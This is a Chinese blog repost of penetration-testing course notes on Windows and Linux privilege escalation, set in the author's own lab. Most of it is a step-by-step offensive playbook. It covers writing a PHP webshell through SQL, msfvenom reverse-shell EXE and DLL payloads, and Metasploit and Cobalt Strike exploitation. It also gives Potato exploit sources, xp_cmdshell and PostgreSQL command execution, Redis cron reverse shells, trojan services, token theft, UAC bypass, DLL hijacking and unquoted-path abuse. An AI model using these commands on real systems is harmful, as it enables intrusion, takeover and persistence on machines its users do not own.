win权限提升-随堂笔记

admin 2025年1月25日02:06:24评论14 views字数 8373阅读27分54秒阅读模式

从刘迪(小迪安全)  迪总yyd

免责声明:仅供参考学习,禁止非法活动,如有违法犯罪,概不追究本人责任。

穿插提权讲一下。嘿嘿嘿

131天  提权概念

内网中: 你在哪里 你是谁 你能干嘛

重点在于:WEB权限  宿主机权限 计算机系统权限 域控制器权限

win权限提升-随堂笔记

第一个实验

上传木马

win权限提升-随堂笔记

进入成功

win权限提升-随堂笔记

补充:mysql的root链接不支持远程链接,即使我知道mysql的地址,用户和密码,也是链接不了的。但是可以通过这个 phpmyadmin 后台 对目标主机搭建这个服务器的mysql去链接。

mysql 支持写入数据,如果我们登入了 phpmyadmin 平台,可以借助这个平台 写入一个后门   (getshell 用哥斯拉去强制开启 远程链接 在134天有讲到)

select'<?php eval($_POST["pass"]);>'into outfile '地址'//数据库权限到web权限 

132天 工具提权

1、Web搭建平台差异

集成软件,自行搭建,虚拟化等

集成软件:宝塔,PhpStudy,XAMMP等(集成软件搭建的网站平台,渗透进去权限较高)用什么权限安装软件,渗透进去就是对应的该权限

自行搭建:自己一个个下载安装搭建配置(权限较低)

虚拟化:Docker,ESXi,QEMU,Hyper-V等

2、Web语言权限差异

ASP/ASP.NET/PHP/JSP等

权限高低:JSP>ASP.NET>ASP=PHP

3、系统用户权限差异

Windows:

System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。

Administrators:管理员组,具有对计算机进行完全访问和操作的权限。

Users:用户组,一般用户的默认组别,拥有较低的系统权限。

一般上渗透进入之后,权限主要为下面的东西

Guests:

访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。

Backup Operators:

备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。

Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。

Remote Desktop Users:远程桌面用户组,允许用户进行远程桌面连接。

Network Configuration Operators:网络配置操作员组,允许用户管理网络配置。

Performance Log Users:性能日志用户组,允许用户收集性能日志和计数器数据。

Distributed COM Users:

分布式 COM 用户组,允许用户使用分布式 COM 连接到计算机。

IIS_IUSRS: 用于授权IIS相关服务的用户组。

Linux:

系统用户:UID(0-999)

普通用户:UID(1000-*)

root用户:UID为0,拥有系统的完全控制权限

前期工作准备

1.购买服务器

攻击机 

账号 root

密码 随便定

安装命令

添加HTTPS协议,允许apt从HTTPS下载安装软件包sudo apt-get install apt-transport-https ca-certificates curl software-properties-common进入到opt目录下cd /opt/下载安装文件 msfupdate.erbsudo wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb将文件msfupdate.erb重命名为msfinstall,并且赋予755权限,安装msfsudo mv msfupdate.erb msfinstallsudo chmod 755 msfinstall./msfinstall如果上述命令没有报错的话,说明我们安装成功,我们可以执行命令验证其正确与否msfconsole
目标主机 win 2008 

账号  administrator

密码  啦啦啦

Windows Server 2008安装配置IIS_server 2008 iis安装路径-CSDN博客

细节: 就是将 这个 网站内容给到默认的 Default web site 这个 里面 就行

win权限提升-随堂笔记

第一个实验  (msf 工具支持更新)

#Web到Win-系统提权-溢出漏洞-MSF&CS

Windows 2008(IIS+ASP)-MSF

自行搭建+ASP/PHP+Windows 2008

攻击步骤 

生成msf.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.243.78.17 LPORT=3333 -f exe -o msf.exe
win权限提升-随堂笔记

再开一个窗口开启监听

use exploit/multi/handler  启动监听模块set payload windows/meterpreter/reverse_tcp  这个上面生成的msf.exe 的payloadshow options 查看配置set lhost 0.0.0.0  设置所以ipset lport 3333   监听端口run 启动background   返回

msf上线(执行 msf.exe  msf上线)

win权限提升-随堂笔记

检测存提权的漏洞

use post/multi/recon/local_exploit_suggester   使用一个模块set showdescription true        看到具体提权内容  显示提权那些存在show options     查看内容session     查看 session 模块set session 1  设置 session模块    这个就是 那个主机的权限 run  跑起来   看一看有没有可以利用的漏洞    
win权限提升-随堂笔记

最后一步 提权

use exploit/windows/local/ms16_075_reflection_juicy  用到这个payloadshow options  查看相关信息set session 1   让这个payload 攻击session 1run  攻击开始

提权成功

win权限提升-随堂笔记

第二个实验  (cs  插件 更新)

Win10安装和配置IIS web服务器环境来运行ASP(动态服务器页面)脚本_win10配置iis运行asp-CSDN博客

Windows 2016(IIS+ASP.NET)-CS

复现搭建:选择2016系统后自行安装IIS+ASP.NET

0、CS安装

cd Cobalt_Strike_4.7/

chmod +x ./teamserver

chmod +x ./TeamServerImage

./teamserver {攻击机IP} {password}

1、连接CS

2、创建监听器

3、加载脚本插件

问题:

避坑:这里的 杀毒需要全部关掉,然后 .NAT  需要配置 url上允许 aspx文件  这样才能链接成功(很麻烦)

win权限提升-随堂笔记

启动cs

cd Cobalt_Strike_4.7/chmod +x ./teamserverchmod +x ./TeamServerImage./teamserver 8.210.237.102 xiaobao

这里有个细节 就是需要 服务器 的端口开放  监听那个端口 就需要在安全组设置开放端口  比如我这里监听 8888  所以我就需要入方向开放 这行端口

win权限提升-随堂笔记

加载插件 用来提权

win权限提升-随堂笔记

接下来的手法就是,查看当前目录,发现有 cs.exe  然后再用这个提权的权限 再上线一个 发现上线的是系统权限 。

或者用哥斯拉本身的工具提权

win权限提升-随堂笔记

第三个实验  (宝塔)

#Web到Win-系统提权-宝塔面板-哥斯拉

Windows 2012(宝塔Apache+PHP)-MSF

复现搭建:选择2012系统后自行安装宝塔

PMeterpreter

BypassOpenBaseDir

BypassDisableFunction

可以说是哥斯拉利用宝塔的漏洞绕过从而权限提升

133天 人工提权&&土豆家族

优点:解决实时更新不集成的EXP

缺点:操作繁琐,需要各种复现调试

解决工具或插件无法实时更新,又或者集成较少面对复杂情况下人工操作更适合

一,人工提权-用户权限到系统权限

win权限提升-随堂笔记

如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用

在线网站使用

潮影在线免杀平台

Windows 提权辅助 | 在线安全工具

无影工具箱也可以

在线工具使用

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

这个工具需要下载一个最新版 (翻墙 因为 这个是2023 版本的有点老了  漏洞有些老)

systeminfo > systeminfo.txtpython wes.py systeminfo.txt -cpython wes.py systeminfo.txt -c -i "Elevation of Privilege" -o vuln.csv

集合到一个 文档里面 这个工具真好

收集到这些提权漏洞,我们就可以尝试 用这些 漏洞 试一试 凭自己经验选择好的漏洞提权。

win权限提升-随堂笔记

漏洞如何利用  找到一些 平台

3、EXP获取执行

KernelHub 针对常用溢出编号指定找EXP

Poc-in-Github 针对年份及编号指定找EXP

exploitdb 针对类型及关键说明指定找EXP

https://github.com/Ascotbe/Kernelhub  (这个比较好,可以参考他的 测试成功的案例  用对应 的cve漏洞去搞,但是他的测试 是从计算机用户权限到计算机系统权限  可能web权限到 计算机系统权限不适应 都有可能 所以就需要我们多去总结 )

https://github.com/nomi-sec/PoC-in-GitHub  (所有的poc整理 )

win权限提升-随堂笔记

https://gitlab.com/exploit-database/exploitdb(比较综合)

二,土豆家族-Web到Win系统提权

https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w

土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,

可以将低权限的服务用户提升为“NT AUTHORITYSYSTEM”特权。

1、Test in:Windows 10/111809/21H2)

2、Test in:Windows Server 2019Datacenter(1809)

3、Test in:Windows Server 2022Datacenter(21H2)

SweetPotato OK

RoguePotato

BadPotato OK

EfsPotato OK

GodPotato OK

PetitPotato OK

MultiPotato

CandyPotato

RasmanPotato OK

CoercedPotato

JuicyPotatoNG

PrintNotifyPotato OK

GodPotato

https://github.com/BeichenDream/GodPotato

SweetPotato

https://github.com/CCob/SweetPotato

RoguePotato

https://github.com/antonioCoco/RoguePotato

BadPotato

https://github.com/BeichenDream/BadPotato

EfsPotato

https://github.com/zcgonvh/EfsPotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

CandyPotato

https://github.com/klezVirus/CandyPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

实验一 (2019  土豆家族提权)

getshell 拿到权限,可是 权限较低

win权限提升-随堂笔记

用cs进行上线

win权限提升-随堂笔记

上线成功

win权限提升-随堂笔记

这个提权成功

win权限提升-随堂笔记

土豆家族提权操作

1.上传土豆家族东西

win权限提升-随堂笔记

执行文件 提权成功

win权限提升-随堂笔记

用这个权限 执行 cs文件,将系统权限给到 cs 渗透工具中。  上线成功 admin权限

win权限提升-随堂笔记

别的土豆都是差不多,我就不演示了

实验二 (2022 权限提升都是一样的手法 )

我这里就不演示了

这源码编译 都需要 在这一节末尾

用这些源码 可以利用到 免杀技术  这样上传上去就不会就被杀掉

win10  win11  也是可以的  Efspotabo

134天 数据 win库提权 mysql  mssql  Oracle

获取数据库服务器权限或者shell

数据库提权流程:

1、先获取到数据库用户密码

-网站存在SQL注入漏洞

-数据库的存储文件或备份文件

-网站应用源码中的数据库配置文件

-采用工具或脚本爆破(需解决外联问题)

2、利用数据库提权项目进行连接

MDUT

Databasetools

RequestTemplate

https://github.com/SafeGroceryStore/MDUT

https://github.com/Hel10-Web/Databasetools

https://github.com/1n7erface/RequestTemplate

3、可利用建立代理解决不支持外联

-利用已知Web权限建立代理(等同于本地连接)

-利用已知权限执行SQL开启外联(让数据库支持外联)

GRANT ALL PRIVILEGES ON *.*TO'帐号'@'%' IDENTIFIED BY'密码' WITH GRANT OPTION;

flush privileges;

EXEC sp_configure 'show advanced options',1;

RECONFIGURE;

EXEC sp_configure 'Ad Hoc Distributed Queries',1;

RECONFIGURE;

ALTER SYSTEM SET REMOTE_LOGIN_PASSWORDFILE=EXCLUSIVE SCOPE=SPFILE;

SHUTDOWN IMMEDIATE;

STARTUP;

4、可利用数据库提权类型条件及技术

-MYSQL:PHP+MYSQL 以web入口提权

条件:ROOT密码和高版本的-secure-file-priv没进行目录限制 -->  my.ini 文件里面  找到 这个函数  如果 后面是 "" 或者没有 就说明没有限制 

技术:UDF MOF 启动项 反弹Shell  

第一步 哥斯拉数据库 用户名和密码是否正确 

第二步 因为mysql默认不支持外链(不支持外链 (默认)如果用哥斯拉 web权限 能够直接连接(本地到本地) 但是如果只是用的下面的两个工具 在本地主机去链接是链接不上的)

解决方案 :

1.强制开启 外联服务

在哥斯拉里面执行这个sql语句 强制开启

GRANTALL PRIVILEGES ON*.*TO'帐号'@'%' IDENTIFIED BY'密码'WITHGRANT OPTION;flush privileges;

然后用下面两个工具去链接 就可以,就可以提权这个数据库的服务器了

2.建立隧道技术 代理 

利用 连接过后 哥斯拉自带有 隧道插件 HttpProxy  SoksProxy 建立一个 本地链接的操作

去获取数据库权限  这个操作 后面再讲 内网里面的知识  这里没有说

补充知识点 :

哥斯拉创建shell的时候 有代理设置 这个设置是干嘛的?  __>  链接的时候 用指定地址链接  就是说 如果我用的是代理池,那么哥斯拉这个shell创建的时候 就要写这个代理池的 对应的ip和端口 ,这样我链接上去的shell就不会被泄露我的原始ip地址哥斯拉在 链接过后 理由有插件 HttpProxy  SoksProxy   这个链接是干嘛用的? __>   这个技术可以在本地开放一个端口,看是监听是否有人链接过来  

实验 :mysql - php  提权 -->命令执行 (用第一种方法)

第一步getshell

win权限提升-随堂笔记

尝试链接 上去  (因为木马是在他们服务器运行,所以就是 本地到本地链接)

条件一 知道用户名和密码

win权限提升-随堂笔记

条件二知道 这个 -secure-file-priv  目录限制为空

win权限提升-随堂笔记
win权限提升-随堂笔记
强制开启远程链接  

是因为 这个工具地址 输入的是 ip地址,虽然在我的靶场中,这个工具和mysql在一个主机上,但在真实渗透环境中下面这个 工具里面的地址需要填写ip地址,不能填写localhost,所以从真实渗透角度来看,说明不在本地就不能链接。(因为我尝试将地址改为localhost 就能链接成功,但在真实的渗透环境中,mysql服务器不可能在本地,需要填写一个真实的ip地址)。

win权限提升-随堂笔记

哥斯拉强制开启 远程链接操作

避坑:这里链接成功我使用的是 mysql 5.7.26版本  我是用 8.0.12 和 5.5.29  都不行  所以避坑

win权限提升-随堂笔记

就可以用我的那个工具链接

报错了 感觉可能是 查杀 给我杀掉了

win权限提升-随堂笔记

第一步解决方案就是在这个目录创建这个 

win权限提升-随堂笔记
第二步 secure_file_priv="" 这个东西
win权限提升-随堂笔记
ok
win权限提升-随堂笔记
-MSSQL:.NET+MSSQL 以web入口提权

条件:sa密码 

技术:xp_cmdshell sp_oacreate CLR 沙盒   用到下面两个工具

默认允许外联

-Oracle:(站库分离,非JSP,直接数据库到系统等)

一般和java 连用 所以感觉不太需要 提权

条件:数据库用户密码

技术:DBA,普通用户,注入模式

默认允许外联

工具一把梭哈
win权限提升-随堂笔记
win权限提升-随堂笔记

135天 数据库 linux提权 postsql redis

-PostgreSQL

Web到系统

条件:数据库用户密码

技术:CVE-2019-9193(这个成功概率最高) UDF(高版本不允许) libc(产生提权在低版本)

复现镜像:

https://market.aliyun.com/products/56024006/cmjj016247.html

手工复现

用navicat 链接上去 输入这些命令

DROPTABLE IF EXISTS cmd_exec;CREATETABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT*FROM cmd_exec;
win权限提升-随堂笔记
用工具
win权限提升-随堂笔记

另一款工具

win权限提升-随堂笔记

-Redis

数据库到Linux  (提权不支持 windows)

条件:利用未授权或密码连接后执行

见第78天课程内容-只适用Linux (我的笔记写过)

win权限提升-随堂笔记

技术:写密钥ssh 计划任务 反弹shell CVE2022沙盒执行

复现搭建:

wget http://download.redis.io/releases/redis-2.8.17.tar.gztar xzf redis-2.8.17.tar.gzcd redis-2.8.17makecd src//redis-server
win权限提升-随堂笔记
工具提权(这款工具提权用到linux的反弹shell)
win权限提升-随堂笔记
攻击主机 开启监听

受害机写入计时任务

win权限提升-随堂笔记
win权限提升-随堂笔记

更改写入公钥攻击机开放监听端口

yum install nc nc -lvvp 8899
win权限提升-随堂笔记
另一款工具
win权限提升-随堂笔记
补充知识点 

反弹shell计划任务写到这里面,为后面蓝队的溯源做准备

win权限提升-随堂笔记

其实这个数据的提取可以看 服务攻防1 里面有集成好的exp工具

-Memcached

数据库到Linux

条件:设置远程可访问或取得本地权限后访问

是一套常用的key-value缓存系统,由于它本身没有权限控制模块,

服务被攻击者扫描发现,通过命令交互可直接读取memcache中的敏感信息。

win权限提升-随堂笔记

复现镜像:

https://market.aliyun.com/products/56024006/cmjj017529.html

案例参考:

https://mp.weixin.qq.com/s/V_p1heyM-2HxsaFLRs9qeg

开启命令:

systemctl start memcached.service

关闭命令:

systemctl stop memcached.service

查看状态:

systemctl status memcached.service

第三方软件提权:

利用cs的插件获得更多信息

远控类:Teamviewer 向日葵 Todesk VNC Radmin等

密码类:各大浏览器 Xshell Navicat 3389 等

服务类:FileZilla Serv-u Zend等

文档类:Winrar WPS(漏洞,钓鱼攻击) Office等

原理:

1、通过普通用户或Web用户收集或提取有价值凭据进行提升

2、通过普通用户或Web用户上传类似钓鱼文件等待管理提升

演示:

1、计算机用户:Teamviewer

web权限不行 需要用到用户权限

用cs插件就知道 id 和 密码 就可以 直接用这款软件给链接上去

2、计算机用户:NavicatPremium

用cs插件去点一点

web权限不行 需要用到用户权限

3、计算机用户或WEB权限:Winrar(CVE2023)

web权限也可以

CVE-2023-38831 winrar漏洞复现_cve-2023-38831漏洞复现-CSDN博客

一旦用有版本的漏洞的winrar去解压,如果在没有杀毒软甲的控制下就会被中招、

4、计算机用户:浏览器密码凭据

web权限不行 需要用到用户权限

136天-win计算机用户-进程注入-令牌窃取服务启动-远程管理

服务启动(提权)

sc是用于与服务控制管理器和服务进行通信的命令行程序。

适用版本:windows 7100812161922,早期用at命令

1、创建一个名叫syscmd的执行文件服务sc Create syscmd binPath= "c:msf.exe"2、运行服务scstart syscmd

这个是msf

win权限提升-随堂笔记

这个是cs上线

win权限提升-随堂笔记

补充

win权限提升-随堂笔记

远程控制(提权)

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstoolspsexec.exe -accepteula -s -i -d "木马的绝对路劲"#调用运行cmd

需要先下载这个系统包

找到下载这个系统包的目录,然后进行权限提高

上线成功 system权限

win权限提升-随堂笔记

进程注入(降权&提权)

前提是adminstor权限  

如果进入很低的用户权限 那么进程注入是无法看到别人的进程

MSF:

ps //查看进程  (一般选取x86 好搞)migrate PID //迁移对应PID
提权 adminstor --> system 
win权限提升-随堂笔记
降权  adminstor --> user

反着来就行

实战中自动提权(getsystem)
win权限提升-随堂笔记

CS:

提权 adminstor --> system 
ps //查看进程inject PID //注入对应PID
win权限提升-随堂笔记
降权  adminstor --> user

反着来就行

实战中自动提权
win权限提升-随堂笔记

细节 msf 和 cs 的木马不能同时在线否则 将注入不成功。

令牌窃取(降权&提权)

前提是adminstor权限  

如果进入很低的用户权限 那么进程注入是无法看到别人的进程

MSF:

use incognitolist_tokens -uimpersonate_token "NT AUTHORITYSYSTEM"
提权 adminstor --> system 
win权限提升-随堂笔记
降权  adminstor --> user

反着来就行

CS:

提权 adminstor --> system 
helpps //查看进程steal_token PID //窃取进程令牌spawnu PID //窃取进程令牌上线
win权限提升-随堂笔记
降权  adminstor --> user

反着来就行

关于进程注入和令牌窃取 细节

win权限提升-随堂笔记

users权限想往上 提权 就需要前面的知识点去提权(还有下一节课的内容)

为什么要进行提高到system

场景

常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。

因为能提到最高权限就提到最高权限,当遇到域环境我们也不怕。

为什么要降到用户权限

场景

内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。

因为一个主机可能有两个用户一个adminstor一个user ,但是user又隶属于域环境,如果我们想要进入域环境,我们要么降权到user用户,要么提升到system权限获取整个主机的权限去进入域环境。

137天-Win系统权限提升篇&UAC绕过&DLL劫持&未引号路径&可控服务&全检项目

Win10&11-BypassUAC自动提权-MSF&UACME

首先如何知道对方电脑开启UAC服务

REG QUERY HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA
win权限提升-随堂笔记
win权限提升-随堂笔记
win权限提升-随堂笔记

为了远程执行目标的exe或者bat可执行文件需要绕过此安全机制

在用户到系统权限自动提权中也学通过BypassUAC实现自动化提权

绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)

开启UAC和未开启UAC时,CS/MSF默认getsystem提权影响(进程注入等)

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx -f exe -o msf.exe

1、MSF模块:

win权限提升-随堂笔记

居然可以,哈哈哈可能是我的win版本太低了   2019 , 2022 年都可以直接提权

use exploit/windows/local/askuse exploit/windows/local/bypassuause exploit/windows/local/bypassuac_sluihijackuse exploit/windows/local/bypassuac_silentcleanup
win权限提升-随堂笔记

2、UACME项目:

https://github.com/hfiref0x/UACME

Akagi64.exe 编号 调用执行

因为执行文件就会爆出来提示,这个东西就是绕过这个机制。

Akagi64.exe 41 C:UserssbnbDesktopstc-isp.exe.lnk

直接过了

win权限提升-随堂笔记

msf给到这个工具上

win权限提升-随堂笔记

Windows-DLL劫持提权应用配合MSF-FlashFXP

webshell权限(普通用户权限)---->系统权限

原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录

2、C:WindowsSystem32

3、C:WindowsSystem

4、C:Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功

检测:ChkDllHijack 火绒剑

项目:https://github.com/anhkgg/anhkgg-tools

利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx -f dll -o xiaodi.dll

提前信息收集相关软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

操作

1.在掌握的权限中,要知道有哪些应用

2.应用知道后怎么分析调用dll

3.尝试对这个dll进行替换覆盖成后门dll

4.程序应用被执行后会被调用后门dll

实验

1.通过信息收集找到对方主机存在应用
2.网上下载相同的软件
3.找到有用dll

这两个dll文件的目录都不是系统目录,而是与flashfxp一个目录下的,所以我们有权限执行这些dll文件。

win权限提升-随堂笔记
4.也可以用另一款工具找到可劫持dll
win权限提升-随堂笔记
5.替换后门 dll
win权限提升-随堂笔记
6.钓鱼启动 

(不仅是 用户权限可以这样钓鱼,而且web权限也能这样,因为只要web权限能能够去执行一些dll文件就可以尝试高一下)

win权限提升-随堂笔记

但是呢 程序可能打不开(需要dll封装,一个负责正常上线,一个负责正常运行(免杀会讲到))

Windows-不带引号服务路径配合MSF-MacroExpert

webshell权限(普通用户权限)---->系统权限  和dll差不多类似钓鱼

原理:服务路径配置由于目录空格问题,可上传文件配合解析恶意触发执行

过程:检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功

win特性

路径没有包含在引号中,服务会按照以下顺序依次执行

参考文献 ;【Windows提权】不带引号的服务路径提权_未使用双引号包裹的服务路径来进行windows提权的漏洞编号是什么-CSDN博客

win权限提升-随堂笔记
c:program.exec:program files.exec:program files(x86)grasssoftmacro.exec:program files(x86)grasssoftmacro expertMacroService.exe

检测命令:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """

上传反弹exe,设置好对应执行名后,执行sc start "Macro Expert"

win权限提升-随堂笔记

Win2012-不安全的服务权限配合MSF-NewServices

很少碰到

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

检测脚本:accesschk.exe -uwcqv "" *

https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

sc config "test" binpath= "C:Program.exe"

sc start test

win权限提升-随堂笔记
win权限提升-随堂笔记

不行

win权限提升-随堂笔记

综合类检测项目

https://github.com/carlospolop/PEASS-ng(和厉害的工具 )

PEAS-ng适用于Windows和Linux/Unix*和MacOS的权限提升工具。winPEAS.bat > result.txtwinPEASany.exe log=result.txt
win权限提升-随堂笔记

然后把这个文件问一下 AI  看他怎么说

学完这些给我第一感受就是要学免杀,不然在内网寸步难行。

感谢阅读谢谢,嵩艺感谢大家的支持。后续还有我的笔记尽情期待。

网络安全学习者们,一同进步,加油各位,未来可期。

原文始发于微信公众号(嵩艺):win权限提升-随堂笔记

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月25日02:06:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   win权限提升-随堂笔记https://cn-sec.com/archives/3670396.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息